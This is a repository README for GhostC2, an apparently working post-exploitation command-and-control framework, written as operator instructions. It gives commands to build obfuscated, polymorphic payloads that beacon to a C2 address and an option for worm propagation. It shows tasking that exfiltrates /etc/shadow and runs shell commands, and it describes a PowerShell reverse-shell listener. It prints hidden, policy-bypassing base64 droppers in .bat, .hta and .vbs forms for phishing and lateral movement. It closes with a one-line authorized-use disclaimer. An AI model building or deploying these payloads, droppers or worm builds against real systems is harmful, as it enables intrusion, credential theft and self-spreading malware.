Loading repository data…
Loading repository data…
wolfwashere / repository
GhostC2 is a lightweight post-exploitation command and control framework built in Python and Flask. It supports real-time communication over WebSockets, polymorphic payload generation, encrypted tasking, and optional .exe builds for Windows delivery. Designed for flexibility and stealth, GhostC2 gives operators a clean dashboard for managing beacon
GhostC2 is a modular, encrypted, post-exploitation command-and-control (C2) framework built with Python and Flask. It features real-time WebSocket communication, polymorphic payload generation, structured JSON tasking, operator authentication, optional .exe packaging, and a fully interactive file browser UI.
Check out the wiki for an Operator Quickstart Guide.
.exe compilation with PyInstallerscan <subnet> ports:<port1>,<port2>...)NOTE: All dashboard actions (browse, getfile, scan, shell, etc.) now use JSON tasking by default. Payloads support full obfuscation and polymorphism with every feature.
GhostC2/
├── builds/ # Compiled payloads (.py, .exe)
├── downloads/ # Exfiltrated files from agents
├── output/ # (Optional legacy output dir)
├── payloads/ # WebSocket and polling Python agents
│ ├── ghost_socket_payload.py
│ └── ... # (other agent scripts)
├── server/
│ ├── app.py # Main Flask + SocketIO server
│ ├── ps_handler.py # PowerShell reverse shell TCP listener
│ ├── templates/ # HTML templates for dashboard, console, login
│ └── payloads/ # (Generated PowerShell payloads)
├── static/
│ └── payloads/ # (Droppers: .bat, .hta, .vbs)
├── tools/
│ ├── generate_payload.py # Payload generator script
│ └── ps_builder.py # PowerShell payload builder
├── utils/
│ └── crypto.py # AES encrypt/decrypt helpers
└── README.md
pip install flask flask-login flask-socketio eventlet pyinstaller
cd server
python app.py
Visit http://localhost:8080
Default Login:
Username: admin
Password: ghostpass123
python payloads/ghost_socket_payload.py
# Generate Python payload
python tools/generate_payload.py
# With .exe output
python tools/generate_payload.py --exe
python tools/generate_payload.py --c2 http://10.10.10.10:8080/beacon --result http://10.10.10.10:8080/result
To also compile to .exe:
python tools/generate_payload.py --c2 http://10.10.10.10:8080/beacon --result http://10.10.10.10:8080/result --exe
To enable worm propagation:
python tools/generate_payload.py --worm
Payloads now include a unique AES key and register it with the server on first contact.
When tasks are queued (by the dashboard, or via API), they’re sent as JSON to the agent:
{
"action": "browse",
"path": "/home/user/"
}
Shell command:
{
"action": "shell",
"command": "whoami"
}
File exfil:
{
"action": "getfile",
"path": "/etc/shadow"
}
The dashboard generates these automatically when you click actions or send tasks.
GhostC2 includes a web-based console for interacting with beacons in real-time.
scan)GhostC2 now supports an interactive file browser for any active beacon, fully compatible with obfuscation and polymorphic builds.
Agent will:
server/downloads/<hostname>/Agent will:
Payloads generated with --worm will:
worm.pyUseful for:
GhostC2 now supports polymorphic PowerShell reverse shell payloads for Windows agents.
System.Net.Sockets.TcpClientPS C:\>-style prompt/generate_ps_payloadTo generate a .ps1 stager:
Run the Flask server:
python3 server/app.py
Navigate to the dashboard and click: “Generate PowerShell Payload”
The generated payload will be saved to:
/server/payloads/ps_payload_<timestamp>.ps1
It will be automatically served for download.
Run the payload on a Windows target using:
Set-ExecutionPolicy Bypass -Scope Process -Force
.\ps_payload_20250517_XXXXXX.ps1
⚠️ Ensure
ps_handler.pyis running and listening on port1443:
sudo python3 server/ps_handler.py
To change the default connection host/port:
Edit tools/ps_builder.py:
host = "YOUR_C2_IP"
port = 1443
GhostC2 now supports one-click, base64-encoded PowerShell droppers for Windows phishing and lateral movement, in .bat, .hta, and .vbs formats.
.bat, .hta, .vbs)Run the Flask server:
python3 server/app.py
Navigate to the dashboard and click: “Generate PS Dropper”
Paste your .ps1 payload, select the desired wrapper, and generate.
Download your dropper from the dashboard.
powershell -nop -w hidden -ep bypass -EncodedCommand <BASE64>
<script language="VBScript">
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -w hidden -ep bypass -EncodedCommand <BASE64>"
self.close
</script>
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -w hidden -ep bypass -EncodedCommand <BASE64>", 0
<BASE64> with the encoded payload (generated automatically).Base64-encoding is enabled by default and recommended for all dropper types.
server/static/payloads/ and available for download via the dashboard.Pro Tip: To decode and review any generated PowerShell dropper’s command, use:
[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('<BASE64>'))
.hta, .bat, and .vbs wrappers ✅GhostC2 is for authorized red team or academic use only.